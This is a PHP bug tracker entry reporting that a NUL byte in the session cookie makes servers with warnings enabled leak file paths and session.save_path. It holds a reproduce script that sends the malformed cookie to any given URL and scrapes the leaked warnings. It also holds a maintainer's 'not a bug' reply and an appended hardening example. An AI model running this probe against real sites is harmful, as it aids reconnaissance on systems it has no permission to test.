Bug #42310 Information disclosure when using invalid symbol in the session id
Submitted: 2007-08-15 13:28 UTC Modified: 2007-08-15 18:53 UTC
Votes:3
Avg. Score:5.0 ± 0.0
Reproduced:2 of 2 (100.0%)
Same Version:2 (100.0%)
Same OS:2 (100.0%)
From: astalor at gmail dot com Assigned:
Status: Not a bug Package: Session related
PHP Version: 5.2.4RC1 OS: ALL
Private report: No CVE-ID: None
 [2007-08-15 13:28 UTC] astalor at gmail dot com
Description:
------------
If you put an invalid symbol in the session ID and PHP warnings are turned on, you can retrieve information about files and paths on the server and also, in some cases, the configured session.save_path variable from PHP.INI. This can display warnings (and sometimes break pages that count on redirection with header()) on pages that are perfectly correct and without any errors in them.

Reproduce code:
---------------
<?php
/* This script checks if PHP warnings are enabled for the targeted website */
function checkWarnings($url) {
	$ch = curl_init ();
	curl_setopt($ch, CURLOPT_URL, $url);
	curl_setopt($ch, CURLOPT_TIMEOUT, 2);
	curl_setopt($ch, CURLOPT_COOKIE,"PHPSESSID=\0");
	curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch, CURLOPT_HEADER , 1);
	$output = curl_exec($ch);
	curl_close($ch);
	
	preg_match_all("/<b>Warning<\/b>:(.*)<br \/>/i",$output,$match);
	preg_match_all("/session.save_path is correct \((.*)\)/i",$output,$path);
	#echo $output;
	echo "<pre>";
	echo "Checking <b>$url</b>\n";
	if (count($match[0]) > 0) {
		echo "<b>Warnings found</b>:\n";
		echo implode("\n",$match[0]);
	} else {
		echo "Warning are <b>disabled</b>\n";
	}
	// isset() avoids an undefined-index notice when ?debug is not supplied
	if (isset($_GET['debug']) && $_GET['debug'] == 1) {
		echo "<b>Displaying page:</b>\n";
		echo $output;
	}
	#print_r($path);
}
checkWarnings($_GET['url']);
?>

Expected result:
----------------
Warning:  session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /home/user/public_html/main/file.php on line 32
Warning:  Unknown: Failed to write session data (files). Please verify that the current setting of session.save_path is correct (/tmp) in Unknown on line 0


Actual result:
--------------
The same as the expected result, as long as PHP warnings are enabled.

 [2007-08-15 18:53 UTC] johannes@php.net
Thank you for taking the time to write to us, but this is not
a bug. Please double-check the documentation available at
http://www.php.net/manual/ and the instructions on how to report
a bug at http://bugs.php.net/how-to-report.php

Well, if display of errors is activated we give the error message. As usual, user data should be filtered by you before doing anything with them and display_errors should be disabled on production systems...
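
The two mitigations named in the reply above (filter the client-supplied session ID, keep error display off in production), as an added example that is not part of the original report or of PHP itself. The function names, the 128-character cap and the sample inputs are assumptions made for illustration.

```php
<?php
// Added example. Assumption: this file is included before any call to
// session_start() in the application.

// Do not render diagnostics to clients; record them server-side instead.
// Prefer setting these in php.ini so they also cover errors raised
// outside script execution.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// Accept the session ID only from the cookie, never from the URL.
ini_set('session.use_only_cookies', '1');
ini_set('session.use_trans_sid', '0');

/**
 * True if $id uses only the characters the warning lists as valid
 * (a-z, A-Z, 0-9, '-' and ','). The length cap is an assumption.
 */
function is_valid_session_id($id)
{
    return is_string($id)
        && preg_match('/\A[A-Za-z0-9,-]{1,128}\z/', $id) === 1;
}

/**
 * Drop a malformed client-supplied ID before session_start() sees it,
 * so PHP issues a fresh ID instead of raising the warning.
 */
function start_session_safely()
{
    $name = session_name();
    if (isset($_COOKIE[$name]) && !is_valid_session_id($_COOKIE[$name])) {
        unset($_COOKIE[$name]);
    }
    return session_start();
}

// Constructed sample inputs: the NUL byte from the report, a value with
// other illegal characters, and a well-formed ID.
foreach (array("\0", 'bad id!', 'k3v9a1b2c3d4e5f6a7b8c9d0e1') as $sample) {
    printf("%-32s %s\n", json_encode($sample),
        is_valid_session_id($sample) ? 'accepted' : 'rejected');
}
```

Calling start_session_safely() in place of session_start() means a request carrying an illegal session cookie gets a new session rather than a warning, whatever the error-display setting.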